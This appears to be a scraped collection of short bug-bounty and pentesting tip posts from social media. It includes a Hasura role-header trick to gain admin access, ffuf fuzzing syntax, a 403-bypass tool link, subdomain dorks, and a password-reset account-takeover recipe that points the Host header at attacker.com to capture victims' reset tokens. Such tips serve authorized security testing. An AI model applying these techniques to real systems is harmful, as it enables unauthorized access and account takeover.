Interesting Hasura GraphQL Framework Access Control Issue.
Found an authenticated endpoint "/script"
Added two headers to the existing request:
X-Hasura-Role: admin
X-Hasura-User-Id: 0
Was able to query as admin 😀#bugbountytip#cybersec#infosec
#bugbountytips
You don't need to write a bash script to fuzz multiple URLs with ffuf, you can simply do
ffuf -w urls.txt:URL -w wordlist:FUZZ -u URL/FUZZ
You can also omit the / if your URL list already has slashes ;)
Automatically Bypass 403 Pages (a ton of methods)
-
This script will test for URL bypasses, to reach a 40X protected page / endpoint.
-
Repo: https://github.com/laluka/bypass-url-parser…
-
Creator:
A decade ago, when I started studying Information Technology seriously, I never thought I'd actually get into cybersecurity. I now have 4x as many kids, more facial hair, & more weight... but I also have my OSCP. #itsnevertoolate
From now until 28/11/2022 23:59:59 UTC there is 37.33% off our membership!
Test your knowledge on our realistic web application "BARKER" which currently contains 170 vulnerabilities based on real findings from
In android penetration testing while static analysis process you can find some awesome secrets/keys hardcoded here Are the most keywords I've used and I found a great keys
👇👇#BugBounty#bugbountytips#bugbountytip#bugbounty
Amazing evasion standoff between Windows 11 Defender and Windows 10 Defender. As one would expect Win 11 is far superior, but there's always something you can do to bypass detection 😉👇#pentesting#redteaming#offensivesecurity
You can find deep domains without tools. like this simple dorks :🙃
site:*.site.com -www
site:*.*.site.com -www
site:*.*.*.site.com -www
#infosec#bugbountytip#cybersecuritytips
Easy | Rare AccountTakeover
1. Capture Password Reset request in Burp
2. Change the HostHeader to HOST: http://attacker.com
3. Victim triggers the Pw Reset link, Token will be captured in logs
4. Change the victim's password using the captured token.
#BugBountyTips#Infosec
private window
- Make sure proxy is configured (e.g., Burp Suite)
- Go out for a coffee and when you will be back ...
#infosec#cybersecuritytips#bugbountytip
Doing internet scanning research?
I have a list of IP ranges owned by top cloud providers, AWS, Azure, GCP, Godaddy, Linode, Rackspace.
All ready for internet research with masscan!
https://github.com/pry0cc/cloud-ranges…